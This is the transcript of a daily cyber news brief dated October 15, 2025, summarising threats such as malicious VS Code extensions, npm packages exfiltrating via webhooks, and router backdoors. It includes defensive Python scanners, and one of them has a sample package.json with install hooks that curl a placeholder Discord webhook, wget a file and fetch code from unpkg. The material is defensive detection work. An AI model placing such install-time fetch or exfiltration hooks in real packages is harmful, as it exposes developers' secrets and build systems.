The BCM Daily Cyber News brings you clear, timely updates on threats, breaches, patches, and trends every day. Stay informed in minutes with focused audio built for busy professionals. Learn more and explore at BareMetalCyber.com.
This is today’s cyber news for October 15th, 2025. You can also subscribe to the highly detailed newsletter and view the archive of previous headlines at daily cyber dot news.
Microsoft’s October patch fixed 172 flaws, including six zero-days, as Windows 10 loses free security updates. This creates both urgent risk and a business choice between Extended Security Updates and moving to Windows 11. Leaders: set a 30-day plan for Windows 10 estates and track progress weekly. Defenders: deploy zero-day patches within 48 hours and watch for post-patch exploit attempts and patch-compliance gaps. If rollout slips, apply mitigations, isolate high-risk users, and verify compliance daily.
The U.K. cyber agency says major incidents more than doubled, driven by state groups and criminals targeting critical services and suppliers. Expect more disruption via identity abuse and third-party compromise, not just new exploits. Leaders: hold quarterly reviews on identity exposure, vendor risk, and tabletop results. Defenders: shift detections toward identity misuse and supplier-origin changes. Watch for MFA bypass attempts and new OAuth grants; tighten identity monitoring and supplier controls now.
“Pixnapping” research shows Android apps can infer on-screen content like one-time passcodes without special permissions. That weakens “read and type” multi-factor flows, especially for admins, developers, and finance staff. Leaders: move high-privilege users to hardware security keys. Defenders: lock down mobile app installs and watch for low-permission utilities. Enforce hardware MFA for admins; otherwise restrict installs and check devices for unfamiliar tools within 72 hours.
A China-linked group hid a web shell inside ArcGIS Server components and stayed hidden for a year by blending into normal workflows. Niche business platforms are attractive because few teams baseline them. Leaders: fund integrity monitoring and change control for these systems. Defenders: check ArcGIS file integrity and tie admin actions to service accounts. If tampering is suspected, rotate service credentials and review recent exports within 48 hours.
Signed UEFI diagnostic shells on some Framework laptops can bypass Secure Boot, letting attackers run unsigned code before the OS. This expands pre-boot risk for admin and developer machines and for device attestation setups. Leaders: assign clear ownership for firmware risk and include attestation checks. Defenders: enforce current DB/DBX state and block extra UEFI binaries via device management. Apply DBX updates and disable unneeded shells; if not, limit privileged users and verify firmware-policy drift within 24 hours.
“RMPocalypse” shows a single 8-byte write can break AMD SEV-SNP isolation, weakening confidential computing promises. Cloud providers are rolling out microcode and platform fixes, but customers must validate. Leaders: confirm which regions and instance types are mitigated and plan backups. Defenders: inventory SEV-SNP use, patch hosts, and re-check attestation flows. Until patched, keep crown-jewel workloads off unmitigated hosts and verify attestation daily.
Attackers re-uploaded malicious VS Code extensions to Open VSX by rotating names and publishers, stealing tokens, SSH keys, and wallets. Developer machines have broad access, so one bad extension can become a supply-chain breach. Leaders: allow-list extensions and assign marketplace vetting. Defenders: baseline installed extensions and alert on publisher or hash changes. Lock installs to an approved list; if pending, freeze settings sync and verify inventories this week.
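The "baseline installed extensions and alert on publisher or hash changes" control above is easy to script. The following is an added example written for this brief, not code from the page, from Open VSX, or from any marketplace vendor: it assumes an extension inventory is a dict keyed by extension id ("publisher.name") holding the installed version and the SHA-256 of the package, and the allow-list, baseline and current snapshot are constructed samples. Because the re-uploads rotated names and publishers, it also calls out a "lookalike": an approved extension name appearing under a different publisher.

```python
"""Flag drift in a workstation's installed VS Code extensions against a baseline.

Added illustration, not code from the page or from any marketplace or vendor.
An inventory is a dict keyed by extension id ("publisher.name") holding the
installed version and the SHA-256 of the package; the allow-list, baseline and
current snapshot below are constructed samples.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    extension: str
    kind: str     # lookalike | not_allowlisted | new | hash_changed | removed
    detail: str


def diff_extensions(baseline: dict, current: dict, allowlist: set[str]) -> list[Finding]:
    """Compare the current inventory to the baseline and the allow-list."""
    findings: list[Finding] = []
    # Map bare extension names to their approved ids so that the same name
    # showing up under another publisher can be spotted.
    approved_names = {ext_id.split(".", 1)[1]: ext_id for ext_id in allowlist if "." in ext_id}

    for ext_id, cur in current.items():
        if ext_id not in allowlist:
            name = ext_id.split(".", 1)[1] if "." in ext_id else ext_id
            if name in approved_names:
                findings.append(Finding(ext_id, "lookalike",
                                        f"name matches approved {approved_names[name]}"))
            else:
                findings.append(Finding(ext_id, "not_allowlisted", f"version={cur['version']}"))
            continue
        base = baseline.get(ext_id)
        if base is None:
            findings.append(Finding(ext_id, "new", f"version={cur['version']}"))
            continue
        # Same version but a different package hash: the bits changed without a
        # version bump, which is the clearest sign of a swapped package.
        if cur["version"] == base["version"] and cur["sha256"] != base["sha256"]:
            findings.append(Finding(ext_id, "hash_changed", f"version {cur['version']} unchanged"))

    for ext_id in baseline:
        if ext_id not in current:
            findings.append(Finding(ext_id, "removed", ""))
    return findings


ALLOWLIST = {"ms-python.python", "esbenp.prettier-vscode", "dbaeumer.vscode-eslint"}

BASELINE = {  # constructed: what was approved and installed at the last check
    "ms-python.python": {"version": "2024.2.1", "sha256": "11" * 32},
    "esbenp.prettier-vscode": {"version": "10.1.0", "sha256": "22" * 32},
}

CURRENT = {  # constructed: today's snapshot from the workstation
    "ms-python.python": {"version": "2024.2.1", "sha256": "11" * 32},
    "esbenp.prettier-vscode": {"version": "10.1.0", "sha256": "ee" * 32},       # same version, new bits
    "prettier-team.prettier-vscode": {"version": "10.1.1", "sha256": "ab" * 32},  # approved name, other publisher
    "dbaeumer.vscode-eslint": {"version": "3.0.10", "sha256": "33" * 32},        # approved, newly installed
}


def run_sample() -> list[Finding]:
    return diff_extensions(BASELINE, CURRENT, ALLOWLIST)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.kind:16} {f.extension}  {f.detail}")
```

The hash comparison is what catches a re-upload that keeps the version string: a marketplace listing can be replaced, but the package digest recorded at approval time cannot be. Feeding the findings into the same ticket queue as endpoint alerts keeps "freeze settings sync and verify inventories" from becoming a one-off.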
Malicious npm, PyPI, and RubyGems packages exfiltrate secrets via Discord webhooks during install or first run. Typosquats and small name tweaks help them slip in, and webhooks evade classic command-and-control checks. Leaders: treat developer-package policy as a real security control with owners and metrics. Defenders: use lockfiles, private mirrors, and reputation checks; block unknown webhook domains. Pin dependencies and route installs through vetted mirrors; if not ready, block Discord webhooks and review build logs.
Microsoft limited parts of Internet Explorer Mode in Edge after real-world exploitation tied to legacy components. The change reduces automatic loading and pushes customers to modernize. Leaders: fund upgrades or safe alternatives for must-have legacy apps. Defenders: audit IE Mode use, trim site lists, and isolate legacy flows. Reduce or remove IE Mode; where needed, narrow the list and monitor affected apps this week.
U.S. and U.K. authorities disrupted a huge pig-butchering fraud network, seizing about $15B in bitcoin and hitting exchanges, mules, and wallets. The scams mix cyber tricks with real-world coercion and will likely rebound. Leaders: invest in transaction monitoring and user education that names these scams. Defenders: tune for mule patterns and crypto off-ramp behavior. Tighten new-payee and payment controls now and add manual reviews for risky transfers.
Researchers found npm packages abusing the unpkg dot com CDN to fetch phishing pages or scripts during install. The trick blends into normal developer setup and can steal credentials for source, cloud roles, or publishing rights. Leaders: assign ownership for package policy and default to “no direct internet installs.” Defenders: enforce lockfiles and private registries and alert on install scripts making external HTTP calls. Block unpkg domains on build hosts and review recent install logs for external fetches.
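Both the Discord-webhook packages and the unpkg fetches above share one trait: a literal URL inside an install-time hook. The following is an added example serving both items, written for this brief rather than taken from the page, npm, or any registry project: it assumes the manifest is a package.json string and that install-time hooks carrying a URL are the thing to alert on; the manifest is a constructed sample and the webhook path in it is a placeholder, not a real endpoint.

```python
"""Scan npm lifecycle scripts for install-time fetches, CDN loads and webhooks.

Added illustration, not code from the page or from any registry project. It
parses a package.json string and flags install-time hooks that carry a literal
URL; the manifest below is a constructed sample and its webhook path is a
placeholder, not a real endpoint.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# npm runs these around installation, so a URL here is reached from every
# developer machine and build host that installs the package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepublish",
                   "preprepare", "prepare", "postprepare")
URL_RE = re.compile(r"https?://[^\s\"'`<>)]+")
WEBHOOK_HOSTS = {"discord.com", "discordapp.com"}
CDN_HOSTS = {"unpkg.com"}


@dataclass(frozen=True)
class Finding:
    hook: str
    url: str
    reason: str   # discord_webhook | cdn_fetch | external_fetch


def classify_url(url: str) -> str:
    """Map a URL found in an install hook to the reason it is suspicious."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in WEBHOOK_HOSTS and parsed.path.startswith("/api/webhooks"):
        return "discord_webhook"          # outbound channel that looks like ordinary HTTPS
    if host in CDN_HOSTS:
        return "cdn_fetch"                # code pulled from a public CDN at install time
    return "external_fetch"               # any other literal URL in an install hook


def scan_package_json(text: str) -> list[Finding]:
    """Return one finding per literal URL inside an install-time script."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {})
    findings: list[Finding] = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for url in URL_RE.findall(command):
            findings.append(Finding(hook, url, classify_url(url)))
    return findings


# Constructed sample manifest: three install-time hooks with URLs, plus
# ordinary scripts that should not be flagged.
SAMPLE_PACKAGE_JSON = r'''{
  "name": "example-app",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl -sS https://discord.com/api/webhooks/0000/PLACEHOLDER >/dev/null",
    "install": "wget -q https://example.org/tooling.tar.gz",
    "postinstall": "node -e \"require('https').get('https://unpkg.com/some-pkg@1.0.0/index.js')\"",
    "prepare": "husky install",
    "build": "tsc",
    "test": "jest"
  }
}'''


def run_sample() -> list[Finding]:
    return scan_package_json(SAMPLE_PACKAGE_JSON)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.reason:16} {f.hook:12} {f.url}")
```

Run it over every package.json in the lockfile's resolved tree, not just the top-level project, since the hooks that matter live in transitive dependencies. The "external_fetch" class is deliberately broad: on a build host that installs only through a private mirror, any install-time URL is a policy violation worth a look, and the domain blocks the item recommends are the enforcement side of the same rule.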
On-prem Microsoft Exchange Server 2016 and 2019 are now out of support, ending regular security fixes. These servers have a long history of being targeted, so risk will rise quickly. Leaders: set a hard migration deadline with weekly risk reports. Defenders: lock down exposure, enforce modern auth, and monitor closely for exploits during the transition. If you must hold, isolate services and verify logging and detections daily.
A FortiOS flaw lets authenticated users break out of certain CLI restrictions and run arbitrary system commands. That expands insider and partner risk on high-trust network gear. Leaders: require proof of patch status across all devices and clarify delegated access. Defenders: patch, audit admin roles, rotate credentials, and enable tamper-resistant command logging. If maintenance lags, revoke non-essential roles and review command audit trails within 24 hours.
The Astaroth (Guildma) banking trojan hides payloads inside images on GitHub using steganography. Lures fetch images, extract hidden modules, and steal credentials and session tokens, with repos rotating to dodge blocks. Leaders: align fraud and security teams on stealer risks and session protection. Defenders: block suspicious raw-Git fetches and inspect scripted image downloads. Enforce script and binary allow-lists; otherwise rate-limit and check proxy logs for image pulls followed by script execution.
Proofpoint tracked TA585 using “Monster V2” malware with layered delivery and regional lures. The chain moves from email to staging sites to downloader scripts and filters out sandboxes to extend dwell time. Leaders: enforce DMARC and create quick user-reporting and takedown loops. Defenders: block staged downloads and script launches from user-writable paths. Quarantine lookalike lures and verify endpoints block scripts from temp and downloads folders.
Multiple campaigns spoofed OpenAI-style login and “Sora” pages to steal credentials from workers and consumers. The kits use polished domains, valid TLS, and cloud templates, then test stolen passwords across company SSO and developer tools. Leaders: centralize access to approved AI tools and publish a safe sign-in guide. Defenders: block lookalike domains, require conditional access for odd app logins, and hunt for new OAuth grants. Until centralized, block known lookalikes and verify new grants and MFA changes this week.
“PolarEdge” is a backdoor for routers and small gateways that talks over custom TLS and a private binary protocol. It persists via startup scripts, rotates domains, and uses certificates that blend in, then proxies traffic and steals credentials. Leaders: make edge-device ownership explicit and fund it like endpoint security. Defenders: baseline router TLS egress and require signed firmware with auto-updates. Update and lock down edge gear, segment management planes, and review router egress logs for rare destinations over the next 72 hours.
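"Baseline router TLS egress" and "review router egress logs for rare destinations" come down to one query: which destinations did the device itself, not the clients behind it, reach, and which of those are new and infrequent. The following is an added example written for this brief, not code from the page or from any vendor's product: it assumes a constructed one-flow-per-line log format ("<time> <device> egress src=<ip> dst=<ip> dport=<port> sni=<name|->"), a set of router management addresses, and a baseline of destinations the router is known to contact (updates, NTP); the log lines and all addresses are constructed.

```python
"""Pick out rare, router-originated egress from gateway connection logs.

Added illustration, not code from the page or from any vendor's product. It
assumes a constructed per-flow log format, a set of router management
addresses and a baseline of known router destinations; the sample log and
every address below are constructed.
"""
from __future__ import annotations

import re
from collections import Counter, defaultdict
from dataclasses import dataclass

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<device>\S+) egress src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) sni=(?P<sni>\S+)$"
)


@dataclass(frozen=True)
class Finding:
    dst: str
    dport: int
    count: int
    indicators: tuple[str, ...]   # rare_destination, no_sni


def parse_line(line: str) -> dict | None:
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def rare_router_egress(lines, router_addrs, baseline, max_count=3) -> list[Finding]:
    """Return router-originated destinations that are unbaselined and rare.

    Client traffic passing through the router is ignored on purpose: an
    implant on the router runs on the router, so the device's own outbound
    connections are the signal.
    """
    counts: Counter = Counter()
    snis = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["src"] not in router_addrs:
            continue
        key = (rec["dst"], rec["dport"])
        counts[key] += 1
        snis[key].add(rec["sni"])

    findings = []
    for (dst, dport), count in sorted(counts.items()):
        if (dst, dport) in baseline or count > max_count:
            continue
        indicators = ["rare_destination"]
        if "-" in snis[(dst, dport)]:
            indicators.append("no_sni")   # TLS to a bare address, nothing to tie a name to
        findings.append(Finding(dst, dport, count, tuple(indicators)))
    return findings


# Constructed sample: routine update and NTP traffic from the router, one
# client flow, and two router-originated connections to unknown destinations.
SAMPLE_LOG = """\
2025-10-15T01:00:02Z gw1 egress src=192.0.2.1 dst=203.0.113.10 dport=443 sni=updates.example.net
2025-10-15T01:00:09Z gw1 egress src=192.0.2.1 dst=203.0.113.10 dport=443 sni=updates.example.net
2025-10-15T01:30:11Z gw1 egress src=192.0.2.1 dst=203.0.113.20 dport=123 sni=-
2025-10-15T02:11:09Z gw1 egress src=192.0.2.1 dst=198.51.100.77 dport=443 sni=-
2025-10-15T02:14:40Z gw1 egress src=10.0.0.5 dst=198.51.100.99 dport=443 sni=www.example.com
2025-10-15T03:05:17Z gw1 egress src=192.0.2.1 dst=198.51.100.88 dport=8443 sni=telemetry.example.com
2025-10-15T03:45:00Z gw1 egress src=192.0.2.1 dst=203.0.113.10 dport=443 sni=updates.example.net
"""
ROUTER_ADDRS = {"192.0.2.1"}                               # constructed management address
BASELINE = {("203.0.113.10", 443), ("203.0.113.20", 123)}  # constructed: update server, NTP


def run_sample() -> list[Finding]:
    return rare_router_egress(SAMPLE_LOG.splitlines(), ROUTER_ADDRS, BASELINE)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.dst}:{f.dport}  count={f.count}  {', '.join(f.indicators)}")
```

The baseline is the part that needs maintenance: build it from a clean window after a firmware update, then treat every addition as a change request rather than letting the set grow on its own. The no-SNI indicator is only a hint; some legitimate firmware clients also connect to bare addresses, so it raises priority rather than deciding the outcome.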
That’s the BareMetalCyber Daily Brief for October 15th, 2025. For more, visit Bare Metal Cyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news. We’re back tomorrow.